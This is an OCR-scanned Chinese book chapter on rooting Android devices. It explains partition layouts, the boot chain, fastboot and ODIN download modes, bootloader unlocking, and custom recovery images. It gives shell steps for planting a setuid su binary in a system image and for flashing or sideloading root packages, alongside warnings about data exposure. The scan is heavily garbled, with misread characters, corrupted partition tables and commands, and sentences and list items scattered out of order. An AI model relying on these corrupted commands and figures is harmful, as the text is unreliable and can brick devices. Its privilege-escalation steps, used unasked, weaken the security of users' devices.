包括 Android 对 Unix 系统 UID/GID 映射 关系 的 特殊 实现 AID ， 以 及 在 整个 系统 中 实施 的 限制 和 


权能 。 
我 们 也 深入 介绍 了 Android 的 逻辑 层次 ， 包 括 应 用 层 、 





Android 框 架 层 、DalvikVM、 用 户 空 





间 原 生 代 码 和 Linux 内 核 。 对 于 每 个 层次 , 我们 都 讨论 了 主要 组 件 ， 特 别 是 那些 与 安全 相关 的 组 
件 。 我 们 强调 了 Android 开发 者 对 Linux 内 核 所 作出 的 重要 添加 与 修改 。 
本 章 对 Android 总 体 设计 较 高 层次 上 的 介绍 将 有 助 于 理解 后 续 章 节 ， 这 些 章节 将 进一步 深入 


到 本 童 介绍 的 层次 和 组 件 中 。 
下 一 章 将 解释 如 何 完 全 控制 Android 设备 的 方法 及 其 到 
介绍 一 些 依赖 于 特定 安全 漏洞 的 已 公开 技术 。 




















由 。 我 们 将 讨论 几 种 通用 的 方法 ， 并 














root Android 设备 














在 Android 设备 上 获得 超级 用 户 权 限 的 过 程 通常 被 称 为 root， 这 是 由 于 超级 用 户 账号 无 论 在 
哪个 类 UNIX 系统 中 都 被 叫 作 root。 这 个 特殊 账号 拥有 对 类 UNIX 系统 上 所 有 文件 与 程序 的 权限 ， 
能 够 对 操作 系统 进行 完全 控制 。 

一 个 人 想 要 在 Android 设备 上 获取 管理 权限 ， 可 能 会 出 于 很 多 种 原因 。 就 本 书 而 言 ， 我 们 主 
要 想 在 不 受 UNIX 权限 束缚 的 情况 下 ， 审 查 Android 设备 的 安全 性 。 然 而 ， 有 些 人 想 要 访问 或 修 
改 系统 文件 , 以 改变 一 些 硬 编码 的 配置 或 行为 , 或 者 使 用 自 定义 的 主题 和 开机 动画 来 改变 系统 的 
观感 与 体验 。root 设备 还 允许 用 户 利 载 预 装 应 用 ， 执 行 完整 的 系统 备份 和 恢复 ， 或 安装 定制 内 核 
映像 与 模块 。 此 外 ， 有 一 类 应 用 需要 root 权限 才能 运行 ， 这 些 应 用 通常 称 为 root app， 包 括 基于 















































无 论 你 出 于 何 种 目的 对 设备 进行 root 操作 ， 你 都 需要 认识 到 root 设备 将 会 损害 设备 的 安全 
性 。 一 个 原因 是 所 有 用 户 数据 都 将 暴露 给 被 授予 root 权限 的 应 用 。 此 外 , 这 会 让 你 的 设备 敞开 一 
道 大 门 ， 当 你 的 设备 丢失 或 者 被 次 后 ， 其 他 人 就 可 以 从 中 提取 到 所 有 的 用 户 数据 ， 如 果 在 root 
设备 时 移 除了 安全 机 制 (如 引导 加 载 程 序 锁 或 签名 的 恢复 更 新 )， 则 更 是 如 此 。 

本 章 涵盖 了 root Android 设备 的 一 般 过 程 ， 不 会 涉及 对 特定 Android 版 本 或 设备 型 号 的 详细 
解析 。 本 章 也 会 解释 获取 root 权限 过 程 中 每 个 步骤 会 造成 的 安全 隐患 。 最 后 , 本 章 概要 描述 过 去 
曾 被 用 于 进行 root Android 设备 的 一 系列 安全 漏洞 ， 这 些 安全 漏洞 已 经 在 现在 的 Android 发 行 版 
中 得 到 了 修复 。 



































警告 ”在 对 root 没 有 充分 了 解 的 情况 下 root 你 的 设备 ， 可 能 会 导致 你 的 设备 无 法 正常 工作 。 在 
你 修改 任何 系统 文件 时 ， 更 有 可 能 会 出 现 这 种 情况 。 值 得 庆幸 的 是 ， 大 多 数 Android 设 
备 都 可 以 在 需要 时 恢复 到 出 厂 状态 。 


3.1 理解 分 区 布局 


分 区 是 在 设备 的 持久 性 存储 内 存 中 划分 的 逻辑 存储 单元 或 分 块 ， 而 布局 是 指 对 分 区 制定 次 
序 、 偏 移 和 尺寸 。 分 区 布局 在 绝 大 多 数 设备 中 是 由 引导 加 载 程序 (boot loader ) 来 处 理 的 ， 而 在 
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某 些 罕见 的 情况 下 , 也 可 以 由 内 核 本 身 进行 处 理 。 这 种 底层 存储 分 区 对 于 设备 功能 的 正常 工作 是 




















至 关 重 要 的 。 


























不 同 供应 商 与 设备 平台 的 分 区 布局 各 不 相同 。 两 种 不 同 设备 的 分 区 布局 通常 不 会 完全 相同 。 





但 是 ， 有 几 种 分 区 在 所 有 Android 设 备 中 都 会 存在 。 最 常见 的 是 引导 区 
区 和 缓存 区 。 一 般 来 说 ， 设 备 的 NAND 闪存 会 使 用 以 下 分 区 布局 。 

















、 系 统 区 、 数 据 区 、 恢 复 





口 引导 加 载 程序 存储 手机 的 引导 加 载 程序 ， 这 一 程序 需要 在 手机 开机 时 负责 对 硬件 的 初 























始 化 ， 引 导 启 动 Android 内 核 ， 并 实现 可 供 选 择 的 引导 模式 ( 如 下 载 模式 )。 
口 开机 内 屏 ”存储 设备 开机 后 马上 看 到 的 内 屏 图 像 ， 通 常 包 含 设备 制造 商 或 移动 通信 运营 

















商 的 Logo。 在 菜 些 设 备 上 ， 启 动画 面 位 图 会 被 岁入 在 引导 加 载 程序 中 ， 而 不 是 存储 在 一 


个 单独 的 分 区 里 。 


文件 系统 RAM 磁盘 (initrd )。 


护 机 制 。 








框架 、 程 序 库 、 系 统 二 进 制 文件 ， 以 及 预 装 的 应 用 。 














和 下 载 文件 ) 的 内 部 存储 分 区 ， 在 一 个 已 引导 的 系统 上 ， 会 被 提 

















确定 分 区 布局 























口 引导 区 存储 了 Android 的 引导 映像 (bootimage )， 包含 一 个 Linux 内 核 (zImage ) 和 root 
口 恢复 区 存储 了 一 个 最 小 化 的 Android 引导 映像 ， 该 映像 提供 维护 功能 ， 并 作为 故障 保 
口 系统 区 存储 设备 上 被 挂 载 至 /system 的 整个 Android 系统 映像 ,这 一 映像 中 包含 了 Android 


口 用 户 数据 区 也 称 为 数据 分 区 ， 这 是 设备 对 应 用 数据 和 用 户 文件 ( 如 照片 、 视 频 、 音 频 


E 载 至 /data 目录 。 





口 缓存 区 “用 于 存放 各 种 实用 程序 文件 ， 比 如 恢复 日 志 、 实 时 下 载 的 更 新 应 用 包 。 在 将 应 
用 安装 在 SD 卡 上 的 设备 中 也 会 包含 Dalvik-cache 文件 夹 , 其 中 存储 了 DalvikVM 的 缓存 。 
D 无 线 电 分 区 存储 基带 系统 映像 的 分 区 。 此 分 区 通常 只 在 具有 通话 功能 的 设备 上 存在 。 





可 以 通过 多 种 方式 获取 特定 设备 的 分 区 布局 。 第 一 种 方式 是 查看 /proc 文件 系统 中 partitions 
条 目的 内 容 。 以 下 是 在 一 部 运行 Android 4.2.1 的 三 星 Galaxy Nexus 手机 上 分 区 条 目的 内 容 : 








shell@android:/data $ cat /proc/partitions 





major minor #blocks name 

3 0 1024 mtdblock0 
T1379 0 15388672 mmcblk0 
79 1 128 mmcblk0pl 
179 2 3584 mmcblk0p2 
179 名 20480 mmcblk0p3 
L729 4 8192 mmcblk0p4 
79 3 4096 mmcblk0p5 
E79 6 4096 mmcblk0p6 
179 2 8192 mmcblk0p7 
2.5:9 0 12224 mmcblk0p8 
2.09 1 16384 mmcblk0p9 
259 2 669696 mmcblk0p10 
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2 3 442368 mmcblk0p11 
259 4 14198767 mmcblk0p12 
259 总 64 mmcblk0p13 
179 16 512 mmcblk0Oboot1 


1y.9 8 512 mmcblk0Oboot0 
除了 proc 条 目 ， 还 有 一 种 途径 可 以 获得 这 些 设 备 文件 与 逻辑 功能 的 映射 关系 。 要 做 到 这 一 
点 , 需要 检查 /dev/block/platform 中 SoC 特定 目录 的 内 容 。 在 这 里 , 你 可 以 找到 一 个 名 为 by-name 
的 目录 ， 其 中 每 个 分 区 名 都 被 链接 到 相应 的 块 设 备 上 。 以 下 显示 了 在 与 前 例 同 款 三 星 Galaxy 
Nexus 设备 上 查看 这 个 目录 内 容 的 结 


shell@android:/dev/block/platform/omap/omap_hsmmc.0/by-name $ ls -1 
lrwxrwxrwx root root 2013-01-30 20:43 boot -> /dev/block/mmcblk0p7 























1-30 20:43 userdata -> /dev/block/mmcblk0p12 
1-30 20:43 xloader -> /dev/block/mmcblk0Opl1 


lrwxrwxrwx root root 201 





lrwxrwxrwx root root 2013-01-30 20:43 cache -> /dev/block/mmcblk0pl11 
lrwxrwxrwx root root 2013-01-30 20:43 dgs -> /dev/block/mmcblk0p6 
lrwxrwxrwx root root 2013-01-30 20:43 efs -> /dev/block/mmcblk0p3 
lrwxrwxrwx root root 2013-01-30 20:43 metadata -> /dev/block/mmcblk0p13 
lrwxrwxrwx root root 2013-01-30 20:43 misc -> /dev/block/mmcblk0p5 
lrwxrwxrwx root root 2013-01-30 20:43 param -> /dev/block/mmcblk0p4 
lrwxrwxrwx root root 2013-01-30 20:43 radio -> /dev/block/mmcblk0p9 
lrwxrwxrwx root root 2013-01-30 20:43 recovery -> /dev/block/mmcblk0p8 
lrwxrwxrwx root root 2013-01-30 20:43 sbl -> /dev/block/mmcblk0p2 
lrwxrwxrwx root root 2013-01-30 20:43 System -> /dev/block/mmcblk0p10 

320 

0 











Jrwxrwxrwx root root 2013 

除 此 之 外 ， 还 有 一 些 地 方 可 以 获取 到 关于 分 区 布局 的 信息 。/etc/vold.fstab 文件 、 恢 复 日 志 
( /cache/recovery/last_log ) 以 及 内 核 日 志 (通过 dmesg 或 /proc/kmsg ) 等 ， 都 可 以 在 某 种 情况 下 获 
取 到 分 区 布局 信息 的 位 置 。 如 果 在 这 些 地 方 都 无 法 获取 到 ， 那 你 还 可 以 使 用 mount 命令 或 者 查 
看 /proc/mounts， 来 找到 一 些 关 于 分 区 的 信息 。 


3.2 理解 引导 过 程 


引导 加 载 程序 通常 是 在 硬件 开机 之 后 最 早 运行 的 代码 。 在 大 多 数 设 备 上 , 引导 加 载 程序 是 三 
商 的 私有 代码 ,负责 对 一 些 底层 的 硬件 进行 初始 化 (设置 时 钟 、 内 置 RAM、 引 导 介 质 等 )， 并 为 
装载 恢复 映像 或 者 将 手机 设置 成 下 载 模式 提供 支持 。 引 导 加 载 程序 本 身 通 常 包含 多 个 步 又, 但 是 
在 这 里 我 们 将 它 作为 一 个 整体 来 考虑 。 

当 引 导 加 载 程序 完成 硬件 的 初始 化 之 后 ， 它 从 引导 分 区 中 将 Android 内 核 和 initrd 装载 到 
RAM 中 ， 最 后 ， 它 将 跳 进 内 核 ， 让 内 核 继续 启动 的 过 程 。 

Android 内 核 负 责 处 理 让 Android 系统 在 设备 上 正常 运行 所 需 的 所 有 任务 。 例 如 ， 它 会 初始 
化 内 存 、 输 入 /输出 (1O ) 区 域 、 内 存 保护 、 中 断 处 理 程序 、CPU 调度 器 和 设备 驱动 等 。 最 后 ， 
它 将 挂 载 root 文件 系统 ， 并 启动 最 初 的 用 户 空间 进程 : init。 

init 进程 是 所 有 其 他 用 户 空间 进程 的 父 进 程 。 当 它 启 动 时 ， 从 initrd 服务 挂 接 的 root 文件 系 
统 仍 然 是 读 写 权限 。/initrc 脚本 作为 init 的 配置 文件 ， 指 定 了 初始 化 操作 系统 用 户 空间 组 件 时 需 
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要 采取 哪些 动作 ， 其 中 包括 启动 一 些 Android 核心 服务 ， 如 用 于 电话 通话 的 rild、 用 于 VPN 访问 
的 mtpd 以 及 Android 调试 桥 守 护 进 程 adbd 等 。 其 中 的 一 个 服务 Zygote， 负 责 创建 DalvikVM ， 
然后 启动 第 一 个 Java 组 件 System Server。 最 后 ,其 他 的 Android 框 架 层 服务 ( 如 Telephony Manager ) 
才 会 被 启动 。 

以 下 显示 了 LG Optimus Elite ( VM696 ) 手机 中 的 initrc 脚本 摘录 片段 。 你 可 以 从 Android 开 
源 项 目 (AOSP ) 代码 仓库 的 system/core/init/readme.txt 文件 中 找到 关于 这 一 文件 格式 的 更 多 信息 。 


[va | 
service adbd /sbin/adbd 
disabled 
Eee] 
service ril-daemon /system/bin/rild 
socket rild Stream 660 root radio 
socket rild-debug stream 660 radio system 
user root 
group radio cache inet misc audio sdcargd rw gqcom oncrpc diag 
| 
service zygote /system/bin/app_process -Xzygote 
/system/bin --zZzygote --start-system-server 
socket zygote stream 660 root System 
onrestart write /sys/android power/request_state wake 
onrestart write /sys/power/state on 
onrestart restart media 
onrestart restart netd 


Bt] 
系统 启动 完毕 后 ,一 个 ACTION _BOOT _COMPLETED 事件 将 会 被 广播 ,发 给 事先 在 其 Manifest 
文件 中 注册 接收 这 个 广播 Intent 的 所 有 应 用 。 当 这 个 动作 完成 后 ， 系 统 才 算 完 全 启动 。 


进入 下 载 模式 
在 对 引导 过 程 的 描述 中 , 我 们 已 经 提 到 引导 加 载 程序 通常 都 支持 将 手机 设置 为 下 载 模式 。 这 
种 模式 能 够 让 用 户 在 底层 更 新 手机 的 持久 性 存储 ， 这 个 过 程 通常 被 称 为 “刷机 ”。 视 具体 的 设备 


而 定 ， 刷 机 途径 可 能 包括 fastboot 协议 或 厂商 专 有 协议 , 或 者 两 种 协议 都 支持 。 举 例 来 说 ， 三 星 
Galaxy Nexus 同时 支持 专 有 ODIN 模式 和 fastboot 模式 。 



























































注意 ”fastboot 模式 是 通过 USB 将 完整 硬盘 映像 刷 到 特定 分 区 上 的 标准 Android 协议 。fastboot 
客户 端 工具 是 一 个 命令 行程 序 ， 你 可 以 从 Android 软件 开发 工具 包 (SDK ) 中 获取 ， 下 
载 地址 为 https:/developer.android.com/SDK/， 或 者 从 AOSP 代码 仓库 中 获取 。 








进入 下 载 模式 等 不 同 模式 的 方法 , 取决 于 引导 加 载 程序 的 实现 。 当 在 启动 时 按 住 特定 的 组 合 
键 后 ， 引 导 加 载 程 序 会 启动 下 载 模式 ， 而 不 是 进行 正常 的 Android 内 核 引导 过 程 。 对 于 不 同 的 设 
备 型 号 , 具体 的 组 合 键 也 是 不 同 的 , 但 你 通常 可 以 很 容易 在 网 上 找到 这 些 信 息 。 当 设备 进入 下 载 
模式 后 , 它 将 等 待 PC 通过 USB 进行 连接 。 图 3-1 显示 了 进入 fastboot 模式 和 ODIN 模式 的 屏幕 。 
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执行 替换 的 内 核 映像 等 。 


2 
加 | 


Downloading.… 
Do not turn off target !! 


图 3-1 Fastboot 和 ODIN 模式 


当 宿 主 计算 机 和 引导 加 载 程序 之 间 建 立 起 USB 连接 ， 它 们 之 间 将 会 使 用 设备 支持 的 下 载 协 
议 进行 通信 。 这 些 协议 为 执行 各 种 任务 提供 了 便利 ， 包 括 重 刷 NAND 分 区 、 重 启 设 备 、 下 载 与 
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一 般 而 言 ， 通 过 在 引导 加 载 程序 层次 上 实现 一 些 限制 ,对 引导 加 载 程序 进行 锁定 ， 可 以 防止 





终端 用 户 修改 设备 固件 。 这 些 限 制 取决 于 1 








并 不 包含 任何 对 引导 加 载 程 序 的 了 








在 Google Nexus 设备 上 ， 引 导 加 载 程序 默认 情况 下 是 锁定 的 。 然 而 存在 着 一 个 官方 的 机 制 ， 





民 制 。 


造 商 的 具体 决策 ,可 能 会 有 所 不 同 ， 但 普遍 都 会 采用 
密码 学 的 签名 验证 机 制 来 阻止 设备 被 刷 上 或 执行 未 经 合法 签名 的 代码 。 某 些 廉价 的 Android 设备 

















可 以 让 机 主 对 其 进行 解锁 。 终 端 用 户 如 果 想 运行 一 个 定制 内 核 、 恢 复 镜像 或 操作 系统 镜像 ,那么 








就 需要 首先 对 引导 加 载 程序 进行 解锁 。 对 了 











F 这 些 设备 , 解锁 引导 加 载 程序 的 过 程 很 简单 ， 只 要 使 








设备 进入 fastboot 模 式 并 运行 命令 fastboot oem unlock 即 可 。 这 会 需要 命令 行 模式 的 fastboot 
客户 端 工具 ， 它 包含 在 Android SDK 以 及 AOSP 代码 库 中 。 

一 些 制 造 商 也 支持 对 他 们 设备 上 的 引导 加 载 程序 进行 解锁 , 但 取决 于 不 同 的 设备 型 号 。 在 某 
些 情况 下 ， 解 锁 使 用 通过 fastboot 的 标准 OEM 解锁 过 程 。 然 而 ， 在 一 些 情况 下 ， 需 要 涉及 一 些 
专 有 机 制 ， 比 如 登录 一 个 网 站 或 解锁 门户 页 面 。 这 些 门户 页 面 通常 要 求 机 主 登记 他 的 设备 ， 并 放 
弃 他 的 保修 ,才能 够 解锁 设备 的 引导 加 载 程序 。 在 写作 本 书 时 ，HTC、 摩 托 罗 拉 和 索尼 至 少 允 许 











用 户 对 他 们 的 部 分 设备 进行 解锁 。 

















对 引导 加 载 程序 进行 解锁 会 带 来 严重 的 安全 隐患 。 如 果 这 个 设备 丢失 或 者 被 盗 , 设备 上 的 所 
有 数据 可 以 被 攻击 者 轻易 地 恢复 窃取 。 只 需 上 传 定制 的 Android 引导 镜像 ， 或 者 刷 定制 的 恢复 镜 
像 ， 攻 击 者 就 对 设备 所 有 分 区 上 的 数据 拥有 完全 访问 权 ， 其 中 包括 Google 账号、 文档、 联系 人 、 




















48 第 3 章 root Android 设备 





存储 的 口令 密码 、 应 用 数据 、 照 片 以 及 更 多 个 人 信息 。 正 因为 如 此 ， 当 解锁 一 个 加 锁 的 引导 加 载 
程序 时 , 会 执行 一 次 恢复 出 厂 设 置 ， 从 而 确保 所 有 终端 用 户 的 数据 被 删除 ， 让 攻击 者 无 法 访问 到 





警告 ”强烈 建议 使 用 Android 设备 的 加 密 功 能 。 即 使 所 有 数据 都 已 被 删除 ， 对 于 一 些 设备 ， 仍 
然 有 可 能 通过 取证 手段 恢复 被 删 数 据 。 


官方 和 定制 恢复 镜像 


Android 的 恢复 系统 是 以 软件 更 新 包 蔡 换 设 备 预 装 系统 软件 的 一 套 Android 标准 机 制 ， 这 个 
过 程 不 会 擦 除 用 户 数据 。 这 个 系统 主要 用 来 应 用 手动 或 通过 OTA ( Over-the-Air， 无 线 下 载 ) 方 
式 下 载 更 新 ， 需 要 在 重启 之 后 对 这 些 更 新 进行 离线 应 用 。 除 了 应 用 OTA 更 新 之 外 ， 恢 复 系统 还 
可 以 执行 其 他 任务 ， 比 如 擦 除 用 户 数 据 和 缓存 分 区 等 。 

恢复 镜像 存储 在 恢复 分 区 中 , 包含 一 个 微型 的 Linux 镜像 , 该 镜像 只 有 一 个 简单 的 用 户 界面 ， 
通过 硬件 按钮 来 进行 控制 。 官 方 的 Android 恢复 镜像 特意 设计 成 只 包含 非常 有 限 的 功能 ， 刚 刚 达 
到 Android 兼容 性 定义 文件 ( http://source.android.com/compatibility/index.html ) 的 要 求 。 

与 访问 下 载 模式 类 似 , 你 可 以 在 设备 启动 时 按 一 个 特定 的 组 合 键 进 入 恢复 模式 。 除 了 使 用 按 
键 ， 还 可 以 通过 aqb reboot recovery 命令 ， 指 示 一 个 已 启动 的 Android 系统 重启 并 进入 恢复 
模式 。Android 调试 桥 (ADB ) 命令 行 工 具 可 以 从 Android SDK 及 AOSP 代码 仓库 中 获取 到 ， 获 
取 路 径 为 : http://developer.android.com/sdk/index.html。 

恢复 模式 中 使 用 最 为 普遍 的 一 个 特性 是 应 用 更 新 包 。 更 新 包含 有 一 个 压缩 文件 ( 包含 待 复制 
到 设备 中 的 一 组 文件 )、 一 些 元 数据 和 一 个 更 新 器 脚本 。 更 新 器 脚本 会 告诉 Android 的 恢复 系统 ， 
需要 在 设备 上 执行 哪些 操作 才能 应 用 更 新 修改 。 其 中 可 能 包括 挂 载 系统 分 区 ， 确 认 设 备 和 操作 系 
统 的 版 本 与 更 新 包 应 用 的 目标 是 否 匹 配 ， 验 证 将 被 替换 的 系统 文件 的 SHA1 散 列 值 等 。 更 新 包 会 
通过 一 个 RSA 私 钥 进行 密码 学 签名 , 而 恢复 系统 将 在 应 用 更 新 之 前 , 使 用 对 应 的 公 钥 来 验证 签名 的 
合法 性 。 这 确保 只 有 经 过 认证 的 更 新 才能 被 应 用 。 如 下 片段 显示 了 一 个 典型 OTA 更 新 包 中 的 内 容 。 

解压 Nexus 4 的 一 个 OTA 更 新 包 


$s unzip 625f5f7c6524.signed-occam-JOP40D-from-JOP40C.625f5f7c.zip 
Archive: 625f5f7c6524.signed-occam-JOP40D-from-JOP40C.625f5f7c.zZip 
signed by SignApk 

inflating: META-INF/com/android/metadata 

inflating: META-INF/com/google/android/update-binary 

inflating: META-INF/com/google/android/updater-script 

inflating: patch/system/app/ApplicationsProvider.apk.p 

inflating: patch/system/app/ApplicationsProvider.odex.p 

inflating: patch/system/app/BackupRestoreConfirmation.apk.p 

inflating: patch/system/app/BackupRestoreConfirmation.odex.p 
| 

inflating: patch/system/l1ib/libwebcore.so.p 
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inflating: Patch/system/1ib/1ibwebrtc_audqio_ preprocessing.so.p 
inflating: recovery/etc/install-recovery.sh 

inflating: recovery/recovery-from-boot.p 

inflating: META-INF/com/android/otacert 

inflating: META-INF/MANIFEST.MF 

inflating: META-INF/CERT.SF 

inflating: META-INF/CERT.RSA 


定制 Android 恢复 镜像 对 大 多 数 设备 都 存在 ， 即 使 对 于 某 款 设备 没有 公开 资源 ,你 也 可 以 轻 
松 地 从 AOSP 代码 仓库 中 获取 官方 Android 恢复 源 代码 ， 并 对 其 进行 定制 修改 ， 从 而 创建 出 一 个 
定制 的 恢复 镜像 。 

定制 恢复 镜像 中 包含 的 最 普遍 的 修改 包括 : 
口 包含 一 个 完整 的 备份 和 恢复 功能 ( 如 NANDroid 脚本 ); 
口 允许 未 签名 的 更 新 包 ， 或 者 允许 使 用 自 签名 的 软件 包 ; 
口 选择 性 地 挂 载 设备 分 区 或 SD 卡 ; 
D 为 SD 卡 或 数据 分 区 提供 USB 大 容量 存储 访问 ; 
口 提供 完全 的 ADB 访问 支持 ， 并 以 root 方式 运行 ADB 守护 进程 ; 
口 包含 一 个 完全 功能 的 BusyBox 二 进 制 程序 。 

ClockworkMod 恢复 镜像 项 目 以 及 TeamWin 恢复 镜像 项 目 (TWRP ) 是 非常 流行 的 定制 恢复 镜 
像 资 源 , 为 许多 设备 提供 了 支持 。 图 3-2 显示 了 官方 恢复 镜像 与 ClockworkMod 恢复 镜像 的 屏幕 对 比 。 









































图 3-2 ”Android 恢复 镜像 与 ClockworkMod 恢复 镜像 


警告 ”在 你 的 Android 设备 上 保持 一 个 去 除 签 名 限制 或 者 拥有 完全 暴露 ADB 访问 的 定制 恢复 镜 
像 ， 将 会 为 获取 设备 分 区 上 包含 的 所 有 用 户 数 据 留 下 一 该 数 开 的 大 门 。 
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3.4 ”对 未 加 锁 引 导 加 载 程 序 的 设备 进行 root 


root 的 过 程 需要 涉及 在 系统 分 区 上 拥有 一 个 带 有 恰当 set-uid 权限 的 su 二 进 制程 序 ， 这 会 允 
许 在 任何 需要 的 时 候 提升 权限 。su 二 进 制程 序 通常 与 Android 应 用 (如 SuperUser 或 SuperSU ) 
捆绑 在 一 起 ， 这 个 应 用 在 其 他 应 用 请 求 root 访 问 时 提供 一 个 图 形 化 的 提示 。 如 果 请 求 得 到 许可 ， 
应 用 就 会 调用 su 二 进 制 程序 来 执行 所 请 求 的 命令 。 这 些 包装 su 的 Android 应 用 还 会 管理 哪些 应 
用 或 用 户 被 自动 授予 root 访问 权限 ， 而 无 须 通 知 用 户 。 






































注意 ”Chainfire SuperSU 的 最 新 版 本 可 以 从 http://download.chainfire.eu/supersu 以 恢复 更 新 包 的 
形式 下 载 ， 或 者 从 Google Play 商店 以 独立 应 用 的 形式 下 载 : https://play.google.com/store/ 
apps/details?id=eu.chainfire.Supersu。 

ClockworkMod SuperUser 程序 包 可 以 从 Google Play 商店 的 下 载 : https://play.google.com/ 
store/apps/details?id=com.koushikdutta.superuser， 源 代码 可 从 以 下 链接 获取 : https://github. 


com/koush/Superuser。 





对 于 一 个 未 加 锁 或 可 解锁 引导 加 载 程序 的 设备 , 获得 root 访问 权限 是 很 容易 的 , 因为 你 不 必 
依靠 利用 未 修补 的 安全 漏洞 的 方式 。 第 一 步 是 解锁 引导 加 载 程 序 。 如 果 你 还 没有 搞定 ， 取 决 于 具 
体 的 设备 ， 你 可 以 使 用 3.3 节 中 介绍 的 fastboot oem unlock 命令 ， 或 是 使 用 厂商 特定 的 引导 
加 载 程 序 解 锁 工 具 来 合法 地 解锁 设备 。 

在 写作 本 书 时 ， 摩 托 罗 拉 、HTC 和 索尼 支持 通过 其 解锁 门户 网 站 ， 对 某 些 设备 型 号 的 引导 
加 载 程序 进行 解锁 。 















































注意 摩托 罗拉 的 引导 加 载 程 序 解 锁 门户 网 站 为 https://motorola-global-portal.custhelp.com/app/ 
standalone/bootloader/unlock-your-device-a 。 HTC 的 引导 加 载 程序 解锁 门户 网 站 为 
http:/www.htcdev.com/bootloader 。 索 尼 的 引导 加 载 程序 解锁 门户 网 站 为 http://unlock- 
bootloader.sonymobile.com/。 


当 引 导 加 载 程序 被 解锁 后 , 用 户 就 可 以 自由 地 对 设备 进行 定制 修改 。 这 时 ， 有 几 种 方法 可 以 
在 系统 分 区 中 包含 一 个 为 设备 架构 编译 的 适当 su 二 进 制 程序 ， 并 赋予 正确 的 权限 。 

可 以 修改 出 厂 镜像 并 添加 一 个 su 二进制 程序 。 在 这 个 例子 中 ， 我 们 解压 一 个 ext4 格式 的 系 
统 镜像 ， 挂 载 它 ， 增 加 一 个 su 二进制 程序 ， 然 后 进行 重 打包 。 如 果 我 们 在 设备 上 刷 上 这 个 镜像 ， 
那么 设备 中 就 会 包含 su 二进制 程序 ， 也 就 被 root 掉 了 。 

mkdir systemdir 

Simg2img system.img system.raw 

mount -七 ext4 -o loop system.raw systemdir 


cp su systemdir/xbin/su 
chown 0:0 systemdir/xbin/su 



































3.4 ”对 未 加 锁 引 导 加 载 程序 的 设备 进行 root 51 





chmod 6755 systemdir/xbin/su 
make ext4fs -s -1 512M -a System custom-system.img systemdir 
umount systemdir 


如 果 该 设备 是 AOSP 支持 的 , 那 你 可 以 从 源 代 码 编译 出 一 个 userdebug 或 eng 选项 的 Android 
实例 。 登 录 http://source.android.com/source/building.html 可 以 获取 从 源码 编译 Android 的 更 多 信息 。 
默认 情况 下 ， 这 些 编译 构建 的 配置 文件 提供 root 访 问 : 

curl http://commondatastorage.googleapis.com/git-repo-downloads/repo \ 

-oO ~/bin/repo 

chmod a+x ~/bin/repo 

repo init -u https://android.googlesource.com/platform/manifest 

repo sync 


source build/envsetup.sh 
lunch full maguro-userdebug 


无 论 是 通过 修改 出 三 镜像 来 创建 定制 系统 镜像 , 还 是 通过 源码 编译 你 自己 的 镜像 , 你 都 必须 
将 其 刷 人 系统 分 区 中 来 使 它 生 效 。 例 如 ， 如 下 命令 显示 了 如 何 使 用 fastboot 协议 来 刷 入 镜像 : 

fastboot flash System custom-system.img 

最 直接 的 方法 是 启动 一 个 定制 的 恢复 镜像 , 这 种 方法 可 以 通过 一 个 定制 更 新 包 设置 , 实现 将 
su 二 进 制 程序 复制 到 系统 分 区 中 ， 然 后 设置 恰当 的 权限 。 








































































































注意 使 用 此 方法 时 ， 你 只 需 局 动 定制 的 恢复 镜像 ， 而 不 需要 刷 入 它 ， 因 此 你 只 是 使 用 它 在 系 
统 分 区 中 刷 入 一 个 su 二 进 制 程序 ， 根 本 不 需要 修改 恢复 分 区 。 


要 通过 这 个 方法 进行 操作 ， 首 先 需要 下 载 一 个 定制 恢复 镜像 和 su 更 新 包 。 这 个 定制 恢复 镜 
像 可 以 任 选 , 只 要 它 支持 你 的 设备 。 同 样 , su 更 新 包 可 以 是 SuperSu、SuperUser 或 你 的 其 他 选择 。 

(1) 你 应 该 将 两 者 都 放置 到 设备 的 存储 空间 中 ， 通 常会 放置 到 挂 载 在 /sdcard 位 置 的 SD 卡 上 。 

(2) 接 下 来 ,通过 设置 使 设备 进入 fastboot 模式。 

(3) 此 时 ,打开 命令 行 界面 ,然后 输入 fastboot boot recovery.img, 这 里 recovery .img 
是 你 所 下 载 的 恢复 镜像 原始 文件 。 

(4) 在 恢复 菜单 中 , 选择 选项 来 应 用 一 个 更 新 的 zip 文件 , 然后 浏览 选择 你 在 设备 存储 上 存放 
着 带 有 su 二 进 制 程序 更 新 包 文件 的 位 置 。 

此 外 , 采用 Android 4.1 或 更 高 版 本 的 设备 中 包含 一 个 称 为 sideload 的 新 特性 。 这 一 功能 允许 
通过 ADB 来 直接 应 用 更 新 zip 包 ， 而 不 需要 首先 将 其 复制 到 设备 中 。 要 想 sideload 一 个 更 新 包 ， 
只 需要 运行 adab sideload su-package.zip 命令 即 可 ， 这 里 su-package.zip 是 你 的 计算 
机 硬盘 中 更 新 包 的 文件 路 径 名 。 

在 某 些 设备 上 , 解锁 引导 加 载 程序 之 后 可 以 启动 未 经 签名 的 代码 , 但 是 仍然 无 法 刷 入 未 经 签 
名 的 代码 。 在 这 种 情况 下 , 刷 入 定制 系统 镜像 或 恢复 镜像 在 取得 已 启动 设备 的 root 权限 后 才 可 能 
实现 。 你 可 以 使 用 aa 直接 将 定制 恢复 镜像 写 入 块 设备 中 ,来 蔡 换 恢复 分 区 。 
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3.5 ”对 锁定 引导 加 载 程 序 的 设备 进行 root 


在 引导 加 载 程序 被 锁定 且 厂 商 并 不 提供 合法 解锁 方法 的 情况 下 , 你 通常 只 能 在 设备 中 寻找 一 
个 安全 缺陷, 来 作为 root 设备 的 切 和 点。 

首先 ， 你 需要 确定 你 面 对 的 是 哪 种 类 型 的 引导 加 载 程序 锁 ， 它 可 能 因 制 造 商 、 移 动 通信 运营 
商 、 设 备 型 号 或 同 款 设 备 中 的 软件 版 本 而 异 。 有 些 时 候 ，fastboot 访问 也 被 禁止 了 ,但 是 你 仍然 
可 以 使 用 广 商 专 有 协议 ( 如 摩托 罗拉 的 SBF 或 三 星 的 ODIN ) 来 进行 刷机 。 还 有 些 情 况 下 , 在 同 
款 设备 上 ， 使 用 fastboot 模式 与 使 用 厂商 专 有 下 载 模式 在 执行 签名 验证 时 还 会 有 所 差异 。 签 名 验 
证 可 能 发 生 在 启动 时 或 刷 人 时 ， 或 者 在 两 个 时 刻 都 进行 。 

一 些 锁定 的 引导 加 载 程序 只 对 选择 的 分 区 进行 签名 验证 , 一 个 常见 的 例子 是 只 对 加 锁 的 引导 
